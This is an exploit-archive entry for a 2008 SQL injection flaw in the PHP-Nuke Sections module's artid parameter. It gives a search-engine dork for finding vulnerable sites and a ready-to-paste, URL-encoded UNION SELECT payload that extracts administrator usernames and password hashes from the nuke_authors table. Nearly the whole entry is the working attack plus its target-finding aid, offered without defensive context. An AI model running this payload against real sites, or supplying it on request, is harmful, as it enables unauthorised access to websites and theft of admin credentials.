id: 2665
date: 02/19/2008
title: PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===================================================================
PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability
===================================================================



###############################################################
#
# PHP-Nuke Module Sections SQL Injection(artid)
#
################################################################
#
# DORK 1 : allinurl: "name Sections op viewarticle artid"
#
################################################################
example
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)

EXPLOIT :

-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2




#  0day.today [2023-03-21]  #